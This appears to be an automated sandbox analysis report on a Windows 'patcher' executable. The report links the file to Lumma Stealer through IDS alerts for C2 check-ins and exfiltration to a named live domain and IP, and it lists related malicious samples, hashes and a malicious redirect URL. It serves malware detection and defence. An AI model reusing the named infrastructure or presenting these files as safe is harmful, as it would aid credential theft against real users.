HCA Information:	Successful, ratio: 96% Number of executed functions: 37 Number of non-executed functions: 116
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 20.12.23.50
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Patcher_I5cxa9AN.exe

Simulations

Behavior and APIs

Time	Type	Description
14:41:54	API Interceptor	8x Sleep call for process: aspnet_regiis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.132.7	Loader.exe	Get hash	malicious	LummaC	Browse
172.67.132.7	https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cureprouderio.click	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	DansMinistrie.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	CrosshairX.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.58
	Installer_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	DansMinistrie.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	CrosshairX.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.132.7
	Installer_x64.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.132.7
	Insomia.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.132.7
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.132.7
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.132.7
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.132.7

Process:	C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	431616
Entropy (8bit):	7.0490991148842905
Encrypted:	false
SSDEEP:	12288:e9WCMiFBtleC8gViMGr4qBkQrpFq4l5t:SFtwgcMXUHq4b
MD5:	9A662A61F1EF199CCAFD4363B4964B2D
SHA1:	4FE678EC35B5EFAA9481CB3DC69A66390DADA7C2
SHA-256:	D4459904722D68BCAE78B2C5DBCA9621CF547A155245ECE1EA6A23D5913EACB7
SHA-512:	085A4203B691BB62A3EA4049FE6C8CCC59E213EB4A3BE8A04501A81B504F9C3A7B32EEEF9CE28DDE6317A1C3981C812F229CB3E15893B953769F3B251B48DC24
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L...-.[.-.[.-.[.U.Z.-.[.U.Z.-.[.U.Z.-.[.U.Z.-.[..[.-.[.-.[.-.[.X.Z.-.[.X.Z.-.[.X.Z.-.[.-.[.-.[VX.Z.-.[VX.Z.-.[Rich.-.[........PE..L...t.zg...........!..... ...\|......Nt.......0............................................@.............................\|.......P...................................<~..............................X~..@............0..X............................text............ .................. ..`.rdata...a...0...b...$..............@..@.data...4...........................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.012361487840769
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Patcher_I5cxa9AN.exe
File size:	493'568 bytes
MD5:	f23b6bce35ed7e7fd538a426defd13b8
SHA1:	242506b0ef3ece7276a10ecafa756c72c28b3366
SHA256:	d181f3391f059ff37e887fd3e5055e83bc45d2f3ea744e37113564352948facb
SHA512:	3a45f9b785715df816686731968c295748f488896a93e9c1e2a7d26cf4b33e778735edc74821dd5d13ed6aa9b222f59c66cf72a2e79e6370cf44010e41396c1e
SSDEEP:	12288:Hmx08SHGoAYBTQB5zr1KcpiFCALt7PYNZPPs:QR+GoAYB25n1v2C
TLSH:	E2A48D48F65372AEC787803466EA2F3F9AF425214326CD87D247C68D592A9D3CE37913
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.zg..............0..\|..........^.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x479a5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677ADE76 [Sun Jan 5 19:33:10 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x79a0c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7a000	0x64e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x77a64	0x77c00	bca78be9850336d7fb5d32e1a56d5768	False	0.5270338596033403	data	7.023884578280009	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7a000	0x64e	0x800	07c52749c66929df783ef7ae7fa927ea	False	0.35791015625	data	3.5788490074606556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0xc	0x200	3abe8ee67eb618a13e34bf77417c1da5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7a0a0	0x3c4	data			0.4387966804979253
RT_MANIFEST	0x7a464	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T20:41:54.045515+0100	2058638	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)	1	192.168.2.4	59194	1.1.1.1	53	UDP
2025-01-05T20:41:54.551050+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:54.551050+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:55.054770+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:55.054770+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:55.553164+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:55.553164+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:56.119480+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:56.119480+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:56.848103+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49732	172.67.132.7	443	TCP
2025-01-05T20:41:56.848103+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.132.7	443	TCP
2025-01-05T20:41:57.831328+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	172.67.132.7	443	TCP
2025-01-05T20:41:58.395309+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49733	172.67.132.7	443	TCP
2025-01-05T20:41:58.395309+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.132.7	443	TCP
2025-01-05T20:41:59.616908+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49734	172.67.132.7	443	TCP
2025-01-05T20:41:59.616908+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.132.7	443	TCP
2025-01-05T20:42:00.966408+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49735	172.67.132.7	443	TCP
2025-01-05T20:42:00.966408+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.132.7	443	TCP
2025-01-05T20:42:02.614994+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49736	172.67.132.7	443	TCP
2025-01-05T20:42:02.614994+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.132.7	443	TCP
2025-01-05T20:42:06.017940+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49737	172.67.132.7	443	TCP
2025-01-05T20:42:06.017940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.132.7	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 20:41:54.063147068 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.063188076 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:54.063281059 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.066312075 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.066323042 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:54.550913095 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:54.551049948 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.578629971 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.578643084 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:54.578856945 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:54.624974966 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.625005960 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:54.625051022 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.054770947 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.054869890 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.054924011 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.057255030 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.057270050 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.057282925 CET	49730	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.057287931 CET	443	49730	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.077373981 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.077414036 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.077476025 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.077816963 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.077832937 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.553090096 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.553164005 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.613792896 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.613832951 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.614029884 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:55.648071051 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.648089886 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:55.648135900 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.119469881 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.119725943 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.119776011 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.119796991 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.119920969 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.119966984 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.119973898 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.120192051 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.120235920 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.120243073 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124242067 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124269009 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124285936 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.124294043 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124320030 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124337912 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.124346018 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.124382019 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.224291086 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.224389076 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.224411964 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.224440098 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.224457026 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.224478006 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.224494934 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.224519968 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.225435019 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.225447893 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.225457907 CET	49731	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.225466967 CET	443	49731	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.385742903 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.385773897 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.385852098 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.386162996 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.386176109 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.848005056 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.848103046 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.849378109 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.849387884 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.849591017 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.850737095 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.850882053 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.850914001 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:56.851022005 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:56.851028919 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:57.831337929 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:57.831439018 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:57.831497908 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:57.831702948 CET	49732	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:57.831727028 CET	443	49732	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:57.909574032 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:57.909611940 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:57.909698963 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:57.910022974 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:57.910034895 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.395200014 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.395308971 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.396836042 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.396842957 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.397041082 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.398166895 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.398339033 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.398364067 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.887274981 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.887367010 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:58.887430906 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.889831066 CET	49733	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:58.889852047 CET	443	49733	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.149022102 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.149070024 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.149147987 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.149590969 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.149605989 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.616811037 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.616908073 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.618304968 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.618315935 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.618520021 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.619728088 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.619878054 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.619929075 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:41:59.619993925 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:41:59.620002985 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.248466015 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.248702049 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.248770952 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.248847008 CET	49734	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.248864889 CET	443	49734	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.485018015 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.485054016 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.485124111 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.485449076 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.485461950 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.966226101 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.966408014 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.967830896 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.967839003 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.968035936 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:00.969166040 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.969252110 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:00.969255924 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:01.433480978 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:01.433556080 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:01.433608055 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:01.437033892 CET	49735	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:01.437042952 CET	443	49735	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.136430979 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.136461973 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.136549950 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.136873007 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.136883974 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.614907026 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.614994049 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.616370916 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.616378069 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.616585016 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.618048906 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.618891954 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.618921041 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.619241953 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.619286060 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.619416952 CET	49736	443	192.168.2.4	172.67.132.7
Jan 5, 2025 20:42:02.619443893 CET	443	49736	172.67.132.7	192.168.2.4
Jan 5, 2025 20:42:02.619576931 CET	49736	443	192.168.2.4	172.67.132.7
